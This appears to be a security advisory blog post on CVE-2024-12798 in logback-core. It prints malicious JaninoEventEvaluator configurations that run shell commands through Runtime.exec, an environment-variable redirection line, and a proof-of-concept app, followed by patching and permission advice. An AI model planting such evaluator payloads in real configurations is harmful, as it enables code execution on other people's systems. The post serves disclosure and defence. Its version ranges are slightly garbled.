CVE-2024-12798 - Critical RCE in QOS.CH logback-core JaninoEventEvaluator – What Every Java Developer Must Know

Overview:
The security community has been alerted to a dangerous vulnerability — CVE-2024-12798 — that affects logback-core (by QOS.CH), a popular logging framework used widely in Java applications. This bug, found in all logback-core versions from .1 up to and including 1.3.14, and versions 1.4. to 1.5.12, lets attackers run arbitrary code if they can tamper with your logging configuration or set a sneaky environment variable. The root cause is unsafe use of the JaninoEventEvaluator module.

Let’s break down what’s going on, how attackers can use this, and — most importantly — what you can do to stay safe.

What Is logback-core and JaninoEventEvaluator?

logback-core is a widely used logging “engine” that powers popular Java frameworks. It’s very flexible, thanks in part to its support for custom log evaluations via Janino, a tiny, fast in-memory Java compiler.

JaninoEventEvaluator lets you write log-filtering scripts directly in your logback config file. These scripts are parsed and compiled at runtime — by default, Janino can be very powerful... and very dangerous, if not treated carefully.

The Vulnerability: Arbitrary Code Execution via Configuration

Summary of the Problem:
If an attacker can *modify* your logback.xml (or other logback configuration), or set an environment variable like LOGBACK_CONFIG_FILE to point to a malicious config, they can write a script in Janino that will be run as Java code. This power is what leads to remote code execution (RCE).

Let’s say an attacker can write into your logback config. They can stick an evaluator like this

<eventEvaluator name="malicious" class="ch.qos.logback.classic.boolex.JaninoEventEvaluator">
  <expression>
    java.lang.Runtime.getRuntime().exec("touch /tmp/logback-hacked")
    return false;
  </expression>
</eventEvaluator>

Whenever logback parses this config (could be at application startup), it will compile and execute this code, running arbitrary system commands.

Write access to the logback config file (logback.xml, logback-test.xml, etc.).

- *OR* the ability to set LOGBACK_CONFIG_FILE (or similar env vars), to point to a malicious config file.

This typically means they're already on your system, but it’s not uncommon in shared hosting, CI/CD servers, or container platforms with weak separation.

Exploiting via Environment Variables

Suppose an attacker can set the LOGBACK_CONFIG_FILE env variable. Your Java app might pick up a completely rogue config at next launch:

export LOGBACK_CONFIG_FILE=/tmp/myevil-logback.xml

And let’s say /tmp/myevil-logback.xml contains the Janino-armed exploit from above. Upon startup, the application will happily execute the attacker’s code.

Proof of Concept (PoC)

Here is a complete PoC Java app. If you can modify this app’s logback config, you can pop a “calculator” (or any shell command) on the system.

1. Vulnerable Java Program

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class DemoLogback {
    public static void main(String[] args) {
        Logger logger = LoggerFactory.getLogger(DemoLogback.class);
        logger.info("Triggering logback event for PoC.");
    }
}

2. Malicious logback.xml

<configuration>
  <eventEvaluator name="pwned" class="ch.qos.logback.classic.boolex.JaninoEventEvaluator">
    <expression>
      java.lang.Runtime.getRuntime().exec("xcalc");
      return false;
    </expression>
  </eventEvaluator>
  <appender name="CONSOLE" class="ch.qos.logback.core.ConsoleAppender">
    <encoder>
      <pattern>%msg%n</pattern>
    </encoder>
    <eventEvaluator ref="pwned"/>
  </appender>
  <root level="INFO">
    <appender-ref ref="CONSOLE" />
  </root>
</configuration>

*When you run the Java app with this config, the calculator will pop up (on Linux with X11)!*

Upgrade:

Patch to logback-core v1.5.13 or newer as soon as possible. See: QOS-CH logback-core Releases

File Permissions:

Lock down write access to your logback configs. Only trusted users should be able to update these files.

Environment Hygiene:

Restrict who can set or change environment variables like LOGBACK_CONFIG_FILE, especially in shared and CI/CD environments.

Code Review:

Audit any use of JaninoEventEvaluator in your logback config. Avoid evaluating untrusted expressions.

Official References

- CVE-2024-12798 Official MITRE Record
- QOS.CH logback-core Security Advisory
- Upgrade Instructions & Release Notes
- Janino Documentation

Final Thoughts

CVE-2024-12798 is serious because it breaks security’s fundamental assumption: configuration files aren’t code. Here, they are!
If you run Java applications using logback-core, act now: update, audit, and lock down permissions before attackers find a way in.

Stay vigilant, Java folks!
*If you found this post helpful, please share and help protect the community.*


*Written exclusively for you by an AI cybersecurity analyst. For questions, comment below or contact the maintainer.*

Timeline

Published on: 12/19/2024 16:15:07 UTC
Last modified on: 01/03/2025 14:15:24 UTC